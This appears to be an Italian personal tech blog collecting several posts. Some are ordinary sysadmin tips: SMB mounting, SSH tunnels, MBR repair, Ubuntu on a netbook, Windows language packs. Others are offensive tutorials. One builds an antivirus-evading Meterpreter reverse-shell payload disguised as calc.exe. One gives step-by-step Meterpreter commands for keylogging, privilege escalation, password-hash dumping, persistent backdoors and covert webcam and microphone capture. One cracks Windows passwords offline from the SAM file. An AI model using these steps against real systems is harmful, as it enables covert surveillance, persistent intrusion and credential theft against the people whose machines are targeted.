Mount Windows 7 share from Linux

Assumptions:

• apt-get install smbfs

Simple command:

mount -t smbfs -o username=<share-username>,password=<share-password> ⁄⁄<windows-ip>⁄<share-name> ⁄mnt⁄<directory-name>

SSH port forwarding

Non sapevo che titolo dare all’articolo perché non voglio parlare di “tutto” il port forwarding offerto da ssh, ma di una situazione ben specifica:

dal nostro computer vogliamo accedere ad un particolare servizio (vnc, rdp, smtp, ecc) di un host in una lan, che però non possiamo raggiungere direttamente perché non abbiamo la porta “nattata” sul router.

L’unica cosa che abbiamo a disposizione è un host (molto probabilmente un Linux)  con ssh e la relativa porta “nattata“.

Sporchiamoci le mani, scaricate Putty:

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

Installatelo ed avviatelo.

Ora inserite l’ip del server remoto sul quale è disponibile ssh.

Connection->SSH->Tunnels

La destinazione sarà composta dall’indirizzo ip privato dell’host che volete raggiungere più la relativa porta.

Mentre la porta sarà quella utilizzata in locale, io ho scelto 4444, ma voi potete fare come preferite. Vi consiglio di usare porte “alte”, cioé maggiori della 1024.

Infine cliccate il bottone “Add”.

Cliccate infine sul bottone “Open” e fate il login.

Facciamo un esempio pratico per capire cosa è successo, ipotizziamo che abbiate impostate i seguenti valori e il vostro obiettivo sia contenervi ad una sessione vnc.

ipdelserver: 208.67.220.220
source port: 4444
destination: 192.168.1.10:5900

Non vi rimane che aprire il vostro client vnc e come indirizzo specificare:

localhost:4444

e magicamente sarete indirizzati all’host che prima sarebbe stato impossibile raggiungere! Potete usare anche questa procedura per rendere più sicure le vostre “transazioni”!

Se come me siete amanti della linea di comando, l’equivalente è:

ssh -L portalocale:iphostremoto:portahost utente@ipdelserverssh

Esempio pratico precedente:

ssh -L 4444:192.168.1.10:5900 simone@208.67.220.220

VMware Workstation “Error: Failed to lock the file”

VMware potrebbe non avviare la vostra virtual machine restituendovi questo errore:

“Cannot open the disk … Error: Failed to lock the file”

Dovete recarvi nella directory della vostra virtual machine e cancellare tutte le directory che terminano con:

.lck

La vostra vm si avvierà senza errori.

 

Ripristinare MBR Windows 7 (e posteriori) senza dvd

Come mai il software nella partizione di ripristino dei netbook non è in grado appunto di ripristinare l’mbr? Potrebbero fornire una pendrive usb con il sistema operativo, magari dando la possibilità di scegliere all’utente QUALE sistema operativo.
Comunque:

Scenario:

1. “No operating system found”
2. Nessun dvd di ripristino di Windows

E adesso?
Si potrebbe installare un altro boot manager (grub, lilo…) ma il nostro obiettivo è quello di ripristinare la tabella delle partizioni come Microsoft comanda (o per non far vedere all’assistenza che avete installato un altro sistema operativo).

Ovviamente, arriva GNU/Linux in nostro aiuto!

Masterizzate l’ISO se disponete di un lettore cd o usate Unetbootin per disporre di una pendrive avviabile.

Vi consiglio di usare Unetbootin perché così potete copiarvi già il programma di cui avete bisogno.

Tale programma è ms-sys.

Scaricate i sorgenti da qui e copiateli nella vostra pendrive avviabile… e avviatela!

Adesso dovete recuperare l’archivio con i sorgenti e installarli ma ci sono delle dipendenze da soddisfare prima di compilare.

Se usate Debian o derivate (Ubuntu) dovete prima installare:

sudo apt-get install build-essential gettext

Adesso posizionatevi nella directory dove vi siete salvati l’archivio dei sorgenti e:

tar -xzvf ms-sys*.tgz
cd ms-sys
make
sudo make install

Adesso disponete di un potentissimo tool, i suoi parametri di avvio sono:

Usage:
ms-sys [options] [device]

Options:
-1, --fat12     Write a FAT12 floppy boot record to device
-2, --fat32nt   Write a FAT32 partition NT boot record to device
-3, --fat32     Write a FAT32 partition DOS boot record to device
-4, --fat32free Write a FAT32 partition FreeDOS boot record to device
-5, --fat16free Write a FAT16 partition FreeDOS boot record to device
-6, --fat16     Write a FAT16 partition DOS boot record to device
-l, --wipelabel Reset partition disk label in boot record
-p, --partition Write partition info (hidden sectors, heads and drive id) to boot record
-H, --heads  Manually set number of heads if partition info is written
-7, --mbr7      Write a Windows 7 MBR to device
-i, --mbrvista  Write a Windows Vista MBR to device
-m, --mbr       Write a Windows 2000/XP/2003 MBR to device
-9, --mbr95b    Write a Windows 95B/98/98SE/ME MBR to device
-d, --mbrdos    Write a DOS/Windows NT MBR to device
-s, --mbrsyslinux    Write a public domain syslinux MBR to device
-z, --mbrzero   Write an empty (zeroed) MBR to device
-f, --force     Force writing of boot record
-h, --help      Display this help and exit
-v, --version   Show program version
-w, --write     Write automatically selected boot record to device

Prendete nota di come viene identificato il vostro hard disk con il comando:

sudo fdisk -l

Dovrebbe essere tipo:
/dev/sda

Quindi, per esempio, se voleste ripristinare l’mbr dove vi è installato un Windows 7:

ms-sys -7 /dev/sda

Riavviate e voilà!

Ubuntu 10.10 sull’Acer Aspire One D260

< Update del 22/11/2010: CARD READER FUNZIONANTE!!! In fondo alla pagina per la procedura >

Ultimo acquisto, un Acer Aspire One D260 al pessimo prezzo di 299€.

Perché Acer? Continuo a lamentarmi della scadente qualità del telaio, di come ci “appiccicano” la componentistica e di quanto faccia schifo l’assistenza, ma alla fine ho sempre un maledetto acero tra le mani!

Dal mio laptop (Aspire 5920g), al monitor (H223HQ) e infine a questo netbook della mia fidanzata.

< Update del 05/03/2011: come volevasi dimostrare, dopo 7 mesi di vita si sono guastati alcune zone di tasti. L’ennesima conferma della scarsa qualità del prodotto! Attendo notizie dall’assistenza. >

Lo accendo e termino l’installazione di Windows 7, ovviamente preinstallato!

Sistema inutilizzabile, non riesco neppure a scaricare Firefox per i continui crash di Internet Explorer.

Ah, starà facendo gli aggiornamenti… bene, attendo con pazienza 2 riavvii per circa 60 update.

Dopo tutti gli aggiornamenti, stesso film: Explorer che si blocca, navigazione lentissima e, assurdo, neanche ad aprire l’esplora risorse.

Sarà l’antivirus MerdAfee preinstallato? Rimuoviamolo! Niente da fare… un sistema così lento avrebbe fatto incazzare anche San Francesco!

Ah, non si può nemmeno cambiare lo sfondo! Microsoft riesce sempre a farmi ridere…

Installo allora la Ubuntu Netbook Edition 10.04. Rinato! C’è stato meno tempo a installarsi il sistema operativo, cambiare lingua e fare tutti gli aggiornamenti che Windows a fare i soli aggiornamenti.

Stavo per scrivere un articolo, tipo “Acer: Windows? Ubuntu!” quando accade l’inevitabile: il lettore memory card non viene neppure visto dal sistema! E quello era proprio fondamentale per le cazzo di “fotine”.

Purtroppo finché i produttori hardware non si decidono a rilasciare i driver delle loro periferiche per Linux…

Ho provato infine con la beta di di Ubuntu 10.10 e, anche se non legge ancora le memory card, lsusb mi dice che ci sono segni di vita:

Bus 001 Device 006: ID 0cf2:6250 ENE Technology, Inc.
Device Descriptor:
 bLength                18
 bDescriptorType         1
 bcdUSB               2.00
 bDeviceClass            0 (Defined at Interface level)
 bDeviceSubClass         0
 bDeviceProtocol         0
 bMaxPacketSize0        64
 idVendor           0x0cf2 ENE Technology, Inc.
 idProduct          0x6250
 bcdDevice            1.00
 iManufacturer           1 ENE Flash  
 iProduct                2 UB6250       
 iSerial                 4 606569746801
 bNumConfigurations      1
 Configuration Descriptor:
 bLength                 9
 bDescriptorType         2
 wTotalLength           32
 bNumInterfaces          1
 bConfigurationValue     1
 iConfiguration          0
 bmAttributes         0x80
 (Bus Powered)
 MaxPower              498mA
 Interface Descriptor:
 bLength                 9
 bDescriptorType         4
 bInterfaceNumber        0
 bAlternateSetting       0
 bNumEndpoints           2
 bInterfaceClass       255 Vendor Specific Class
 bInterfaceSubClass      6
 bInterfaceProtocol     80
 iInterface              0
 Endpoint Descriptor:
 bLength                 7
 bDescriptorType         5
 bEndpointAddress     0x01  EP 1 OUT
 bmAttributes            2
 Transfer Type            Bulk
 Synch Type               None
 Usage Type               Data
 wMaxPacketSize     0x0200  1x 512 bytes
 bInterval               0
 Endpoint Descriptor:
 bLength                 7
 bDescriptorType         5
 bEndpointAddress     0x82  EP 2 IN
 bmAttributes            2
 Transfer Type            Bulk
 Synch Type               None
 Usage Type               Data
 wMaxPacketSize     0x0200  1x 512 bytes
 bInterval               0
Device Qualifier (for other device speed):
 bLength                10
 bDescriptorType         6
 bcdUSB               2.00
 bDeviceClass            0 (Defined at Interface level)
 bDeviceSubClass         0
 bDeviceProtocol         0
 bMaxPacketSize0        64
 bNumConfigurations      1
Device Status:     0x0000
 (Bus Powered)

Confido allora che con la nuova versione di Canonical ci siano speranze di un riconoscimento hardware al 100%

Update del 22/11/2010: CARD READER FUNZIONANTE!!!

Ecco la procedura:

1) Scaricate il seguente file:

https://bugs.launchpad.net/linux/+bug/530277/+attachment/1714152/+files/keucr.tgz

2) Estraete l’archivio

3) Aprite un terminale e spostatevi dentro la directory nella quale avete estratto il file

4) Digitate i seguenti comandi (attenzione che con l’ultimo comando riavviate il netbook):

cd keucr/
sudo apt-get install linux-headers-generic build-essential
make -C /usr/src/linux-headers-`uname -r` M=`pwd` modules
sudo make -C /usr/src/linux-headers-`uname -r` M=`pwd` modules_install
sudo depmod -a
sudo reboot

5) Godetevi il vostro netbook al 100%!
Procedura testata e funzionante su Ubuntu 10.10 con kernel 2.6.35-22

Meterpreter

Nel scrivere questa guida, ho usato come vittima un Windows 7 Professional x64 e Avira AntiVir come antivirus, il tutto aggiornato fino ad oggi (Sunday, July 25 2010).

Ovviamente la guida è su Meterpreter, come creare una sessione è un argomento che ho trattato in questo articolo.

L’help di Meterpreter (richiamabile digitando appunto “help” oppure “?“) è ricco di spunti per conoscere le sue potenzialità, io tratterò solo di quegli insiemi di operazioni atte uno scopo preciso.

[*] From shell to Meterpreter

Eccoci qua, l’exploit (o quant’altro) ha funzionato:

C:\Users\Simone\Desktop>

Però la shell di Windows è limitata, una sessione Meterpreter?

Premete CTRL+z e rispondete y

Background session 1? [y/N]  y

Adesso siamo tornati al menu della console di Metasploit Framework.

Digitiamo “sessions” per visualizzare le sessioni attive:

msf exploit(handler) > sessions
Active sessions
===============
Id  Type         Information                 Connection
--  ----         -----------                 ----------
1   shell                                    192.168.1.5:4444 -> 192.168.1.7:49500

E adesso facciamo l’upgrade a Meterpreter:

sessions -u 1

digitiamo nuovamente “sessions”:

msf exploit(handler) > sessions
Active sessions
===============
Id  Type         Information                 Connection
--  ----         -----------                 ----------
1   shell                                    192.168.1.5:4444 -> 192.168.1.7:49500
2   meterpreter  SIMOWIN7\Simone @ SIMOWIN7  192.168.1.5:4444 -> 192.168.1.7:49505

E adesso, andiamo alla nuova sessione Meterpreter!

msf exploit(handler) > sessions -i 5
[*] Starting interaction with 5...
meterpreter >

[*] Praeludium

Facciamo il punto della situazione prima di iniziare a lavorare e comportarci di conseguenza.

Informazioni sul sistema remoto:

sysinfo

Il nome utente proprietario del processo Meterpreter (sarà il caso di diventare amministratori?):

getuid

Da quanto tempo l’utente remoto non utilizza il sistema (sarà il caso di migrare il processo?):

idletime

Lo facciamo stare buono?

meterpreter > uictl
Usage: uictl [enable/disable] [keyboard/mouse]

Esempio:

uictl disable mouse

Game over?

shutdown

Keylogger?

[*] Keylogger

meterpreter > keyscan_start
Starting the keystroke sniffer...

Poi continuate il vostro lavoro e quando volete vedere cosa ha catturato:

meterpreter > keyscan_dump 
Dumping captured keystrokes...
gmail <Return> username <Tab> password redtube <Return> strip <Return>

Per fermarlo:

meterpreter > keyscan_stop
Stopping the keystroke sniffer...

[*] Download/Upload

Per navigare tra i files del computer remoto Meterpreter mette a disposizione alcuni comandi che saranno familiari a chi ha un minimo di padronanza con la bash.

E’ anche possibile scaricare o trasferire dei files, utilizzando rispettivamente i comandi “download” e “upload“.

Dovete solo fare attenzione alle directory sulle quali state lavorando, quindi utilizzate i seguenti comandi per orientarvi:

pwd: stampa la directory dell’host remoto, sulla quale stiamo lavorando.

cd: cambia la directory dell’host remoto, sulla quale stiamo lavorando (sintassi bash-like).

lpwd: stampa la directory del nostro sistema, sulla quale stiamo lavorando.

lcd: cambia la directory del nostro sistema, sulla quale stiamo lavorando (sintassi bash-like).

Quindi, tornando ai nostri comandi:

download nomefilecartella

trasferisce un file/cartella dalla “pwd” alla “lpwd“.

upload nomefilecartella

trasferisce un file/cartella dalla “lpwd” alla “pwd“.

[*] Extensions and Script

Ovviamente potete espandere le funzionalità di Meterpreter usando le extensions che aggiungono un nuovo set di comandi o degli script per ottenere uno specifico obiettivo.

Le extensions si abilitano con il comando “use” (esempio “use espia”) e quelle disponibili di default con relativa versione per le architetture a 64 bit sono:

espia (espia.x64) = abilita il comando screengrab, che fa uno screenshot, lo trasferisce sul nostro pc e lo apre col browser.

incognito (incognito.x64) = comandi per pasticciare con gli utenti ed eseguire comandi come se foste uno di essi. Cliccate qui per maggiori informazioni, in inglese).

priv (priv.x64) = comandi:

• getsystem, per ottenere i privilegi di amministratore (vedi paragrafo successivo)
• hashdump, gli hash delle password degli utenti (bisogna essere amministratori)
• timestomp, modifica degli attribuiti MACE (multi-attribute combinatorial exchange) dei files (attribiti, orari e date)

railgun = consente l’accesso diretto alle API di Windows (qualsiasi esistente o proveniente da una DLL caricata sul sistema bersaglio) attraverso Meterpreter.

sniffer = un simpatico sniffer che permette il salvataggio dei pacchetti catturati su un file .pcap

stdapi.x64 = comandi di manipolazione del filesystem per le architetture a 64bit

Invece gli script si lanciano usando il comando “run“. Digitate run e poi premete il tasto Tab per visualizzare tutti gli script disponibili utilizzando l’autocompletamento.

[*] Become administrator

Come avrete capito, la nostra sessione Meterpreter corrisponde (ma dai?) ad un processo sul sistema remoto. Ovviamente a seconda del metodo col quale abbiamo avviato la sessione, il processo sarà di proprietà di un dato utente (getuid). Se questo utente non avesse privilegi sufficienti? Come possiamo ad esempio utilizzare il comando hasdump? Dobbiamo diventare amministratori di sistema! Usiamo allora getsystem:

meterpreter > getuid
Server username: SIMOWIN7\Simone
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

L’esito di questo comando dipende dal sistema operativo e dai privilegi dell’utente. Windows 7 si è dimostrato inattaccabile qualora non fossimo noi ad eseguire un applicativo creato ad hoc con privilegi amministrativi (allora l’UAC serve a qualcosa), mentre su Windows XP si riesce a combinare le peggio cose (un dato significativo visto che è ancora il sistema più diffuso al mondo!)

[*] Migrate process

Se abbiamo modo di pensare che il processo server di Meterpreter sul sistema remoto rischi di venire terminato, possiamo migrarlo su di un processo più sicuro! L’ideale su Windows sarebbe ottenere i permessi amministrativi e migrare sul processo “explorer.exe”…

Innanzitutto si guarda quali sono i processi in esecuzione e ci si annota il PID del processo verso il quale si vuole migrare:

ps

poi si migra al processo desiderato (PID è un numero naturale):

migrate PID

ad esempio “migrate 803″.

[*] Persistent Backdoor

Ho specificato persistent, perché ho visto molti video in cui si accontentavano di creare una backdoor temporanea con NetCat. Il nostro obiettivo è invece quello di installare una backdoor permanente in modo tale che Meterpreter che ci contatti a nostro piacimento, anche dopo un riavvio.

Lo script creato ad-hoc si chiama “persistence” e ha bisogna passargli alcuni argomenti, vediamo quali:

-A        Automatically start a matching multi/handler to connect to the agent
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on the remote host where Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

Ad esempio, se volessimo farci ricontattare quando il sistema si avvia e ogni 15 secondi dopo l’avvio (cercate di eseguire il comando da amministratori!):

run persistence -A -X -i 15

Questo script è favoloso, non viene rilevato dagli antivirus e ci fornisce gentilmente la procedura di disinstallazione una volta terminato il comando. Fate caso quando lo eseguite all’ultima riga di output:

[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/SIMOWIN7_20100727.4925/clean_up__20100727.4925.rc

Che vi sta dicendo che per rimuover ogni traccia bisogna eseguire il comando:

run multi_console_command -rc /root/.msf3/logs/persistence/SIMOWIN7_20100727.4925/clean_up__20100727.4925.rc

[*] VNC and RDP

E per vedere in prima persona cosa sta accadendo sul computer? E magari intervenire? VNC (Virtual Network Computing).

Se utilizzate Ubuntu o Debian, installate prima il viewer (io ho dovuto riavviare, altrimenti non funzionava con lo script):

sudo apt-get install xtightvncviewer

E da Meterpreter lanciate lo script:

run vnc

Si aprirà in automatico una finestra con la sessione vnc, comodissimo!

Mentre per abilitare l’RDP (Remote Desktop Protocol):

run getgui -e

Ci sono altri parametri da passare allo script getgui, vi rimando al suo help “run getgui -h” per approfondimenti.

[*] Webcam&Microphone

<Update Friday, December 31 2010>

Registrare l’audio del microfono per x secondi:

record_mic x

Visualizzare le webcam installate:

webcam_list

Scattare una foto dalla webcam
(usare webcam_list per ottenere il numero x corrispondente):

webcam_snap x

Potete anche usare gli script di ZeroCold che hanno anche la possibilità di registrare un video dalla webcam:

http://zerocold.co.uk/

Prelevate dal suo sito CamRecorder e CamSnap, sotto la sezione Meterpreter Scripts, dopodiché estraete poi il contenuto dei .tar

Attenzione che il file “VFWGrab.exe” è nominato male, c’è uno spazio prima del nome, va rinominato.

I comandi da eseguire all’interno delle rispettive cartelle sono (a seconda di dove avete installato Metasploit):

Per CamSnap:

mv VFWGrab.exe vfwgrab.ini /opt/metasploit3/msf3/data/
mv camsnap.rb /opt/metasploit3/msf3/scripts/meterpreter/

Per CamRecorder:

unrar e upload.rar
mv upload.exe /opt/metasploit3/msf3/data/
mv camrecorder.rb /opt/metasploit3/msf3/scripts/meterpreter/

Adesso la prossima volta che avviate Metasploit Framework nelle sessioni Meterpreter saranno disponibili gli script.

Scatta una foto dalla webcam e ce la invia:

run camsnap

Registra un video dalla webcam per x secondi dove 1<=x<=60 e ce lo invia:

run camrecorder -t x

Subme reverse? Metasploit!

Dopo aver assistito a questo video di pura mala-informazione (a parte il consiglio di non utilizzare Internet Explorer che sottoscrivo pienamente):

E dopo aver letto su certi forum penosi di alcune imprese compiute con SubMe Reverse ho dovuto scrivere un articolo (con molta calma, visto che è nelle mie bozze da diversi mesi).

Subme reverse? Metasploit!

Il progetto Metasploit ci regala Metasploit Framework che è il kit del piccolo penetration tester (mica tanto piccolo!).

Dopo averlo installato, insegniamo all’hacker delle iene che poteva risparmiare i soldi del software e figura del lamer che usa XP.

Via!

Visualizziamo le opzioni di configurazione:

msfpayload windows/meterpreter/reverse_tcp O

Specifichiamo il nostro indirizzo ip (il mio era 192.168.1.5), creiamo l’eseguibile “bad.exe” e mettiamolo in /tmp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 X >/tmp/bad.exe

Questo eseguibile che abbiamo creato, viene però rilevato come infetto da 10/42 antivirus su http://www.virustotal.com

Un buon risultato? Possiamo fare di meglio, alla faccia di tutti i software a pagamento.

Procuriamoci un eseguibile “sano” come la calcolatrice di windows “calc.exe” e poi:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 R | msfencode -x /home/user/calc.exe -t exe -e x86/shikata_ga_nai -c 10 -o bad.exe

Adesso “bad.exe” viene rilevato da 2/42 antivirus… non male!

<Update Monday, November 01 2010: rilevato da 14/43 antivirus.>

Mettiamoci in ascolto:

msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

Quando verrà eseguito il file “bad.exe” dal pc bersaglio con Windows, si aprirà la sessione:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.6
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.6:49363) at 2010-07-24 22:03:54 +0200
meterpreter >

Digitate “help” e gustatevi le potenzialità di meterpreter, che ho sviscerato in questo articolo.

Cracking Windows 7/Vista password

Ogni volta che ne ho bisogno mi dimentico la procedura e perdo sempre un sacco di tempo per raccogliere le idee, così mi sono trascritto i comandi e li condivido volentieri con voi.

Non fate i lamerozzi, se siete interessati (e dovreste esserlo) a cosa state davvero combinando, cercate altrove della documentazione approfondita.

Hypothesis: Backtrack4 e hard disk sul quale è/era installato Windows.

Thesis: recuperare le password degli utenti.

Una volta avviata Backtrack, montate la partizione dell’hard disk sulla quale è installato Windows (in questo tutorial ho usato /mnt e la mia partizione era sda4).

mount /dev/sda4 /mnt/

Spostatevi nella directory (a seconda di dove avete montato la partizione):

cd /mnt/Windows/System32/config

Date i comandi:

bkhive SYSTEM /root/system.txt
samdump2 SAM /root/system.txt > /root/pwd.txt

Se siete interessati a degli utenti in particolare aprite il file pwd.txt ed eliminate le righe degli utenti che non vi interessano.

Spostatevi nella directory:

cd /pentest/passwords/jtr/

Date il comando:

./john -f:NT /root/pwd.txt

E adesso L’attesa può durare diversi minuti (anche ore, giorni…), ma poi spunteranno alla vostra destra i nomi degli utenti e alla vostra sinistra le relative password!

Ah, se non le vedete scritte, vuol dire che sono vuote.

Potrebbe interessarvi anche questo articolo su come recuperare le password di Ubuntu.

Microsoft, una garanzia di cazzate!

Vorrei che leggeste questo articolo… non ho mai visto tante cazzate tutte insieme!

http://www.microsoft.com/italy/pmi/tecnologia/themes/originale/virus/article/article1.mspx

http://www.microsoft.com/italy/pmi/tecnologia/themes/originale/virus/article/article2.mspx

Non ci posso credere. Microsoft riesce solo a fare bene i mouse.

La top 5 delle cazzate:

• I virus vengono scritti da ragazzini. È una convinzione ampiamente diffusa: ci rendiamo conto di quanto sia facile associare i virus con il vandalismo e dare tutta la colpa ai giovani. Lo scrittore di virus tipico è qualcuno che ha appena finito l’università o sta muovendo i primi passi nel mondo del lavoro, non tanto un giovane che frequenta ancora le scuole superiori. Quando eravamo giovani noi c’erano altre forme di protesta. Oggi i ragazzi fanno cose diverse, tra cui scrivere virus.

• Esempi di prefissi sono Win32 (Windows/Linux)
• Registrazione. La maggior parte degli ISP registra ogni dettaglio quando un computer si collega alla sua rete. Tra queste informazioni ci sono gli indirizzi IP assegnati e l’indirizzo MAC della scheda di rete del computer. Quando un’organizzazione è entrata in possesso di un indirizzo MAC, può determinare a quale tipo di scheda di rete appartiene; a questo punto, può contattare il produttore, determinare se è stata venduta singolarmente o come parte di un sistema e infine localizzare la persona che l’ha acquistata.
• Organizzazioni come l’FBI dispongono di esperti in grado di disassemblare e analizzare un virus per determinarne l’origine.
• I virus infettano solo programmi e documenti di Office. Benché i virus normalmente infettino programmi e documenti di Office, alcuni prendono di mira immagini, musica, messaggi di posta elettronica e file di filmati.

Ne consegue logicamente che:

Questo sabato sera, invece di gettare le pietre dal cavalcavia vicino a casa mia, scriverò un virus! Ogni volta che compri un computer ti prendono le impronte digitali. Sono un esperto dell’FBI. Riesco a leggere Linux dalla parola win32. Se uso Office mi prendo dei virus, quindi è meglio non usarlo

Questa però è geniale, non ci avrei mai pensato:

Fare finire rapporti. Un virus può inviare se stesso a chiunque dal vostro PC (a volte includendo persino il vostro nome come mittente o nel messaggio). L’invio di file infetti da virus ad amici e colleghi può contribuire a guastare i rapporti.

Per concludere:

Freeware, shareware e software pirata. Fate sempre attenzione quando qualcuno vi fornisce qualcosa gratuitamente. Benché la maggior parte dei programmi freeware e shareware sia priva di virus, alcuni sono progettati appositamente per offrire la funzionalità desiderata installando nel contempo un virus o un cavallo di Troia che agisce dietro le quinte (il più comune è Back Orifice). Chi contribuisce alla pirateria condividendo software copiato non fa che dare impulso alla diffusione dei virus attraverso il software. Consultate il Capitolo 15 per ulteriori informazioni su questo argomento.

Li denunciamo per diffamazione???

Ridicoli.

Cambiare lingua a Windows 7 Professional

Per alcuni di noi studenti universitari è già possibile scaricare Windows 7 Professional dal sito MSDN, tuttavia la versione è in Inglese e non è presente nel Pannello di Controllo l’opzione per cambiare la lingua.

Ovviamente si risolve il tutto da linea di comando

Prima di tutto, scaricate il language pack dal sito MSDN, in formato ISO:

Se avete installato la versione a 32bit:

“Windows 7 Language Pack (x32) – DVD (Multilanguage)“

- Se avete installato la versione a 64bit:

“Windows 7 Language Pack (x64) – DVD (Multilanguage)“

Potete masterizzare l’iso e inserire il DVD oppure usare un software per montare l’iso su un drive virtuale, consiglio Daemon Tools lite (ovviamente free).

Prendete nota dell’etichetta del vostro lettore (D, E, F,…, la lettera tanto per intenderci) e poi:

Avviate il Prompt dei comandi come Amministratore, per farlo basta cliccare sulla relativa voce nel menù Start con il Tasto DX e selezionare “Esegui come amministratore”. Adesso incollate questa stringa di comando :

dism /online /add-package /packagepath:d:\langpacks\it-it\lp.cab

Dovete cambiare il testo in verde se il vostro lettore ha un’altra etichetta oppure se avete intenzione di installare una lingua diversa dall’italiano.

Una volta comparso il messaggio “The operation completed successfully” potete chiudere la finestra del prompt.

Dopo aver riavviato aprite il Registro di Sistema ( Tasto Win+R e poi “regedit” ) e cercate questa chiave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\UILanguages\en-US

fate una copia di backup ( Cliccando con il tasto dx su en-US e poi su Export ) e cancellatela dal registro (Cliccando con il tasto dx su en-US  e poi su Delete)

Riavviate, ed ecco Windows 7 in Italiano!